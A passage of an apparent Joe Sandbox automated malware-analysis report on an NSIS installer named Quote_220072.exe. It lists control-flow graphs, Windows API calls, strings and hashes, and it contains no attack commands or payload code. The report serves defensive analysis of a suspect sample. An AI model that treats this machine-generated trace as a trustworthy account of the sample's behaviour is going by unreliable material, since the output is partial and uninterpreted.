245->247 246->171 247->171 252 40542e-405441 ShowWindow call 4054c6 247->252 254 405446 252->254 254->189
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
                                                                              • ShowWindow.USER32(?), ref: 00404FD9
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
                                                                              • ShowWindow.USER32(?,00000004), ref: 00405006
                                                                              • GetDlgItem.USER32(?,00000001), ref: 0040512D
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405137
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00405151
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
                                                                              • GetDlgItem.USER32(?,00000003), ref: 0040524E
                                                                              • ShowWindow.USER32(00000000,?), ref: 00405277
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
                                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
                                                                              • EnableWindow.USER32(?), ref: 004052B7
                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
                                                                              • EnableMenuItem.USER32(00000000), ref: 004052D5
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
                                                                              • lstrlenW.KERNEL32(Varighedskravs Setup: Installing,?,Varighedskravs Setup: Installing,00000000), ref: 0040532E
                                                                                • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 0040604E
                                                                              • SetWindowTextW.USER32(?,Varighedskravs Setup: Installing), ref: 00405346
                                                                                • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                              • DestroyWindow.USER32(?,00000000), ref: 0040538E
                                                                              • CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2
                                                                                • Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512
                                                                              • GetDlgItem.USER32(?,000003FA), ref: 004053EB
                                                                              • GetWindowRect.USER32(00000000), ref: 004053F2
                                                                              • ScreenToClient.USER32(?,?), ref: 004053FE
                                                                              • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
                                                                              • ShowWindow.USER32(00000008,?,00000000), ref: 00405436
                                                                                • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040547C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                              • String ID: Varighedskravs Setup: Installing
                                                                              • API String ID: 162979904-452364317
                                                                              • Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                              • Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
                                                                              • Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                              • Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 255 405a1c-405a37 call 4068c4 258 405a39-405a49 call 4065fd 255->258 259 405a4b-405a81 call 406955 255->259 267 405aa4-405acd call 40595d call 406616 258->267 263 405a83-405a94 call 406955 259->263 264 405a99-405a9f lstrcatW 259->264 263->264 264->267 273 405ad3-405ad8 267->273 274 405b65-405b6d call 406616 267->274 273->274 275 405ade-405af9 call 406955 273->275 280 405b7b-405ba9 LoadImageW 274->280 281 405b6f-405b76 call 405e98 274->281 279 405afe-405b07 275->279 279->274 284 405b09-405b0f 279->284 282 405c28-405c30 call 401533 280->282 283 405bab-405bd6 RegisterClassW 280->283 281->280 298 405ce2-405ce4 282->298 299 405c36-405c41 call 40595d 282->299 286 405bd8-405bda 283->286 287 405bdf-405c23 SystemParametersInfoW CreateWindowExW 283->287 289 405b11-405b1f call 4065d4 284->289 290 405b22-405b30 lstrlenW 284->290 293 405ce5-405cec 286->293 287->282 289->290 291 405b32-405b40 lstrcmpiW 290->291 292 405b58-405b60 call 406534 call 406af8 290->292 291->292 297 405b42-405b4c GetFileAttributesW 291->297 292->274 301 405b52-405b53 call 406cee 297->301 302 405b4e-405b50 297->302 298->293 308 405c47-405c61 ShowWindow call 40617c 299->308 309 405cc9-405cca call 405842 299->309 301->292 302->292 302->301 316 405c63-405c68 call 40617c 308->316 317 405c6d-405c7e GetClassInfoW 308->317 312 405ccf-405cd1 309->312 314 405cd3-405cd9 312->314 315 405ced-405cef call 401533 312->315 314->298 320 405cdb-405cdd call 401533 314->320 323 405cf4 315->323 316->317 318 405c80-405c94 GetClassInfoW RegisterClassW 317->318 319 405c96-405cb9 DialogBoxParamW call 401533 317->319 318->319 326 405cbe-405cc7 call 403cd6 319->326 320->298 323->323 326->293
                                                                              APIs
                                                                                • Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                • Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                              • lstrcatW.KERNEL32(1033,Varighedskravs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Varighedskravs Setup: Installing,00000000,00000002,00000000,76F93420,00000000,76F93170), ref: 00405A9F
                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Varighedskravs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Varighedskravs Setup: Installing,00000000,00000002,00000000), ref: 00405B23
                                                                              • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Varighedskravs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Varighedskravs Setup: Installing,00000000), ref: 00405B38
                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00405B43
                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\overlays\besvangredes), ref: 00405B8C
                                                                                • Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A
                                                                              • RegisterClassW.USER32(007A74E0), ref: 00405BD1
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405C4F
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
                                                                              • RegisterClassW.USER32(007A74E0), ref: 00405C94
                                                                              • DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\overlays\besvangredes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Varighedskravs Setup: Installing$_Nb$tz
                                                                              • API String ID: 1975747703-1438879052
                                                                              • Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                              • Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
                                                                              • Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                              • Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 329 40154a-4015bd 330 402ea1 329->330 331 4015c3-4015c7 329->331 351 402ea5 330->351 332 4016c1-4016cf 331->332 333 4017c2-401e9e call 40303e call 4065ad 331->333 334 401684-4016aa 331->334 335 4015e6-4015ee 331->335 336 4018cb-4018d4 call 40303e call 406a34 331->336 337 40160c-40160d 331->337 338 4015ce-4015d0 331->338 339 4016ef-4016fb call 40303e SetFileAttributesW 331->339 340 4016af-4016bc call 4065fd 331->340 341 40182f-40184b call 40303e GetFullPathNameW 331->341 342 401711-401728 call 40303e call 406ba3 331->342 343 401633-40163a SetForegroundWindow 331->343 344 4017d3-4017f6 call 40303e * 3 MoveFileW 331->344 345 4015d5-4015d6 331->345 346 401618-40162e call 403002 Sleep 331->346 347 4015f9-401607 call 4030fd call 401399 331->347 348 40189b-4018b8 call 40303e SearchPathW 331->348 349 4018de-401904 call 40303e call 406de1 331->349 350 40163f-401645 331->350 353 4016d1-4016d5 ShowWindow 332->353 354 4016d9-4016e0 332->354 425 401bb2-401bb6 333->425 426 401ea4-401ea8 333->426 355 402ead-402eb7 334->355 358 4015f0-4015f7 PostQuitMessage 335->358 359 4015dc-4015e1 335->359 409 4018d9 336->409 364 40160e-401613 call 405d18 337->364 338->355 391 401701-401703 339->391 340->330 389 401857-40185d 341->389 390 40184d-401855 341->390 415 401784-40178e 342->415 416 40172a-40173f call 4065d4 342->416 343->330 432 401804-401808 344->432 433 4017f8-4017ff 344->433 356 4015d7 call 405d18 345->356 346->330 347->355 348->330 395 4018be-4018c6 348->395 418 401906-40190c call 406af8 349->418 419 40190e-401920 call 406af8 call 406534 lstrcatW 349->419 369 401671-40167f 350->369 370 401647 350->370 371 402eab 351->371 353->354 354->330 375 4016e6-4016ea ShowWindow 354->375 356->359 358->359 359->355 364->330 369->330 387 401657-40166c call 403002 370->387 388 401649-401650 370->388 371->355 375->330 387->330 388->387 402 40187b 389->402 403 40185f-401862 389->403 401 40187f-401883 390->401 391->330 404 401709-40170c 391->404 395->351 401->351 413 401889-401896 GetShortPathNameW 401->413 402->401 403->402 412 401864-40186c call 4065ad 403->412 404->351 409->391 412->390 438 40186e-401876 call 406af8 412->438 413->351 420 401790-4017ab call 405d18 call 406af8 SetCurrentDirectoryW 415->420 421 4017bb-4017bd 415->421 439 401741-401745 416->439 440 401758-401759 call 405dfc 416->440 442 401925-40192d call 406d1b 418->442 419->442 420->330 456 4017b1-4017b6 420->456 421->364 425->355 426->355 432->404 441 40180e-401816 call 4065ad 432->441 433->364 438->402 439->440 447 401747-40174e call 4064da 439->447 454 40175e-401760 440->454 441->404 458 40181c-40182a call 40621b 441->458 455 40192e-401931 442->455 447->440 464 401750-401751 call 405e1c 447->464 459 401762-401767 454->459 460 401775-40177e 454->460 462 401933-40193d call 4065ad 455->462 463 401964-401966 455->463 456->330 458->364 466 401774 459->466 467 401769-401772 GetFileAttributesW 459->467 460->416 461 401780 460->461 461->415 477 401950-401960 462->477 478 40193f-40194e CompareFileTime 462->478 469 401968-401969 call 406b7b 463->469 470 40196e-401989 call 4068f9 463->470 476 401756 464->476 466->460 467->460 467->466 469->470 480 401a18-401a49 call 405d18 call 403148 470->480 481 40198f-401991 470->481 476->454 477->463 478->477 493 401a52-401a5a SetFileTime 480->493 494 401a4b-401a50 480->494 483 401993-4019df call 406af8 * 2 call 405e98 call 406af8 call 406a86 481->483 484 4019fd-401a13 call 405d18 481->484 483->455 512 4019e5-4019e8 483->512 484->351 496 401a60-401a6d CloseHandle 493->496 494->493 494->496 496->330 498 401a73-401a76 496->498 500 401a78-401a87 call 405e98 lstrcatW 498->500 501 401a89-401a8c call 405e98 498->501 507 401a91-401a9c call 406a86 500->507 501->507 507->359 513 4019f2-4019f8 512->513 514 4019ea-4019ed 512->514 513->371 514->356
                                                                              APIs
                                                                              • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                              • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                              • SetForegroundWindow.USER32 ref: 00401634
                                                                              • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                              • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                                                              • SetCurrentDirectoryW.KERNELBASE(00000000,007B4000,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                              • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                              • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                              • SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
                                                                              • CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
                                                                              • lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp$C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll$Call
                                                                              • API String ID: 3895412863-1897634878
                                                                              • Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                              • Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
                                                                              • Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                              • Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 515 4033cb-403418 GetTickCount GetModuleFileNameW call 4068f9 518 403424-403454 call 406af8 call 406cee call 406af8 GetFileSize 515->518 519 40341a-40341f 515->519 527 403550-40355f call 403367 518->527 528 40345a 518->528 520 403623-40362a 519->520 534 403565-403567 527->534 535 40361e 527->535 529 40345e-403484 call 40311b 528->529 536 403616-40361d call 403367 529->536 537 40348a-403491 529->537 538 403598-4035c8 GlobalAlloc call 403131 call 403148 534->538 539 403569-403581 call 403131 call 406926 534->539 535->520 536->535 542 403512-403515 537->542 543 403493-4034ac call 406692 537->543 538->535 566 4035ca-4035dc 538->566 557 403586-403588 539->557 546 403517-40351e call 403367 542->546 547 40351f-403525 542->547 543->547 560 4034ae-4034b6 543->560 546->547 553 403527-403536 call 406e1a 547->553 554 40353a-403542 547->554 553->554 554->529 562 403548-40354c 554->562 557->535 563 40358e-403592 557->563 560->547 565 4034b8-4034c0 560->565 562->527 563->535 563->538 565->547 567 4034c2-4034ca 565->567 568 4035e4-4035e7 566->568 569 4035de 566->569 567->547 570 4034cc-4034d4 567->570 571 4035ea-4035f2 568->571 569->568 570->547 572 4034d6-4034f5 570->572 571->571 573 4035f4-40360d SetFilePointer call 406692 571->573 572->535 574 4034fb-403501 572->574 576 403612-403614 573->576 574->562 577 403503-40350c 574->577 576->520 577->547 578 40350e-403510 577->578 578->547
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 004033DE
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quote_220072.exe,00000400), ref: 004033FA
                                                                                • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 004068FD
                                                                                • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\Quote_220072.exe,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 00403444
                                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E
                                                                              Strings
                                                                              • Error launching installer, xrefs: 0040341A
                                                                              • Inst, xrefs: 004034B8
                                                                              • Null, xrefs: 004034CC
                                                                              • C:\Users\user\Desktop\Quote_220072.exe, xrefs: 004033E9, 004033F3, 00403407, 00403424
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033D1
                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361E
                                                                              • soft, xrefs: 004034C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                              • String ID: C:\Users\user\Desktop\Quote_220072.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 2803837635-3046352727
                                                                              • Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                              • Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
                                                                              • Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                              • Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 579 405e98-405ea1 580 405ea3-405eb2 579->580 581 405eb4-405ecf 579->581 580->581 582 405ed1-405edc 581->582 583 405ee6-405eed 581->583 582->583 584 405ede-405ee2 582->584 585 4060e1-4060e8 583->585 586 405ef3-405ef6 583->586 584->583 588 4060f3 585->588 589 4060ea-4060f1 call 406af8 585->589 587 405ef7-405f05 586->587 590 405f0b-405f16 587->590 591 4060dc-4060e0 587->591 593 4060f5-4060fb 588->593 589->593 594 4060b5 590->594 595 405f1c-405f60 590->595 591->585 597 4060c3 594->597 598 4060b7-4060c1 594->598 599 406060-406063 595->599 600 405f66-405f77 595->600 601 4060c6 597->601 598->601 602 406065-406068 599->602 603 406099-40609c 599->603 604 405fb7-405fba 600->604 605 405f79-405f97 call 406955 600->605 612 4060c8-4060d6 601->612 610 406078-40608f call 406af8 602->610 611 40606a-406076 call 4065fd 602->611 606 4060a7-4060b3 lstrlenW 603->606 607 40609e-4060a2 call 405e98 603->607 608 405fca-405fcd 604->608 609 405fbc-405fc8 GetSystemDirectoryW 604->609 620 405f9c-405fa5 605->620 606->612 607->606 616 405fdd-405fe5 608->616 617 405fcf-405fdb GetWindowsDirectoryW 608->617 615 406038 609->615 610->606 630 406091-406097 call 406d1b 610->630 611->606 612->587 612->591 625 40603c-406041 615->625 621 405fe7-405ff0 616->621 622 405ffc-406012 SHGetSpecialFolderLocation 616->622 617->615 620->625 626 405fab-405fb2 call 405e98 620->626 636 405ff8-405ffa 621->636 628 406014-40602d SHGetPathFromIDListW CoTaskMemFree 622->628 629 40602f-406036 622->629 631 406043-406046 625->631 632 406054-40605e call 406d1b 625->632 626->625 628->615 628->629 629->615 629->616 630->606 631->632 633 406048-40604e lstrcatW 631->633 632->606 633->632 636->615 636->622
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2
                                                                                • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 00405FD5
                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 0040604E
                                                                              • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 004060A8
                                                                              Strings
                                                                              Memory Dump Source
